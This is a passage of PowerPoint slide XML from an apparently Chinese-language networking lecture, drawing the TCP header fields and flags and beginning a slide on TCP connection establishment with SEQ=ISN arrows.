        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="504031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9" name="Line 159"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="525303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0" name="Line 160"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="546576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1" name="Line 161"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="567848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2" name="Line 162"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="588962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3" name="Line 163"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="610235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4" name="Line 164"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6315075" y="1457325"/>
            <a:ext cx="0" cy="13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5" name="Line 165"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="652780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6" name="Line 166"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="674052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7" name="Line 167"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="695325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8" name="Line 168"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7165975"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9" name="Line 169"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7378700"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0" name="Line 170"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7589838"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1" name="Line 171"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7802563" y="1390650"/>
            <a:ext cx="0" cy="2000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2" name="Line 172"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8015288" y="1457325"/>
            <a:ext cx="0" cy="133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3" name="Rectangle 173"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1355725"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4" name="Rectangle 174"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3055938"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5" name="Rectangle 175"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4756150"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6" name="Rectangle 176"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6456363"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7" name="Rectangle 177"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="418941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75000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>S</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Y</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N</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="1">
              <a:solidFill>
                <a:srgbClr val="333399"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79948" name="Rectangle 178"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="397827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75000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>R</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S</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T</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="1">
              <a:solidFill>
                <a:srgbClr val="333399"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79949" name="Rectangle 179"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="375126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75000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>P</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S</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H</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="1">
              <a:solidFill>
                <a:srgbClr val="333399"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79950" name="Rectangle 180"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3538538"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75000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>A</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C</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K</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="1">
              <a:solidFill>
                <a:srgbClr val="333399"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79951" name="Rectangle 181"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3306763" y="3113088"/>
            <a:ext cx="3000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nSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>U</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R</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="1">
              <a:solidFill>
                <a:srgbClr val="333399"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>G</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="1">
              <a:solidFill>
                <a:srgbClr val="333399"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79952" name="Rectangle 182"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="885825" y="1204913"/>
            <a:ext cx="7286625" cy="333375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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位  </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>0                           8                           16                          24                       31</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600">
              <a:solidFill>
                <a:srgbClr val="333399"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79953" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="6313488" y="4033838"/>
            <a:ext cx="3175" cy="430212"/>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54" name="Rectangle 184"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3924300" y="5241925"/>
            <a:ext cx="4305300" cy="493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5" name="Rectangle 185"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6767513" y="4078288"/>
            <a:ext cx="822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sz="1600">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>填    充</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="333399"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79956" name="Rectangle 186"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5310188" y="5297488"/>
            <a:ext cx="1455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sz="1600">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>数据部分</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="333399"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79957" name="Rectangle 187"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2497138" y="5216525"/>
            <a:ext cx="1406525" cy="5064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8" name="Rectangle 188"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2497138" y="5216525"/>
            <a:ext cx="5757862" cy="506413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="333399"/>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9" name="Line 189"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3903663" y="5227638"/>
            <a:ext cx="0" cy="495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60" name="Rectangle 190"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2692400" y="5345113"/>
            <a:ext cx="720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1" name="Rectangle 191"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2700338" y="5297488"/>
            <a:ext cx="10493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sz="1600">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>首部</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="333399"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79962" name="Rectangle 192"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="638175" y="5313362"/>
            <a:ext cx="206216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a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>报文段</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="333399"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79963" name="Rectangle 193"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2484438" y="6164263"/>
            <a:ext cx="5770562" cy="504825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCCFF"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="333399"/>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4" name="Rectangle 194"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4505325" y="6223000"/>
            <a:ext cx="1374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a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>数据部分</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="333399"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79965" name="Rectangle 195"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1495425" y="6223000"/>
            <a:ext cx="917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en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>首部</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="333399"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79966" name="AutoShape 196"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="2855119" y="5966619"/>
            <a:ext cx="758825" cy="268287"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 70710"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:alpha val="43137"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="333399"/>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7" name="AutoShape 197"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="5799137" y="5967413"/>
            <a:ext cx="758825" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 71131"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="43137"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="333399"/>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8" name="Line 198"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8121650" y="1679575"/>
            <a:ext cx="73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69" name="Line 199"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8121650" y="4016375"/>
            <a:ext cx="73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70" name="Line 200"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="690563" y="1704975"/>
            <a:ext cx="469900"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71" name="Line 201"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="703263" y="4446588"/>
            <a:ext cx="469900" cy="0"/>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72" name="Rectangle 202"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="250825" y="5891213"/>
            <a:ext cx="1095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kumimoji="1" lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>发送在前</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="333399"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79973" name="Text Box 203"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3779838" y="188913"/>
            <a:ext cx="2235200" cy="70802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4000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>协议</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="79974" name="直接连接符 102"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="1799431" y="3320257"/>
            <a:ext cx="504825" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="bg2"/>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spd="slow">
    <p:pull/>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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>TCP连接的建立</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32771"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2772"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32773" name="Straight Arrow Connector 11"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2189163" y="1989138"/>
            <a:ext cx="4535487" cy="431800"/>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2774" name="Straight Arrow Connector 13"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2189163" y="2708275"/>
            <a:ext cx="4535487" cy="504825"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="32775" name="Straight Arrow Connector 14"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2189163" y="3429000"/>
            <a:ext cx="4535487" cy="504825"/>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2776" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2189163" y="4652963"/>
            <a:ext cx="4535487" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:bevel/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32777" name="TextBox 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3419475" y="429260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itchFamily="49" charset="-122"/>
                <a:sym typeface="黑体"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2778" name="TextBox 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3844925" y="1844675"/>
            <a:ext cx="2487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SEQ=ISN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
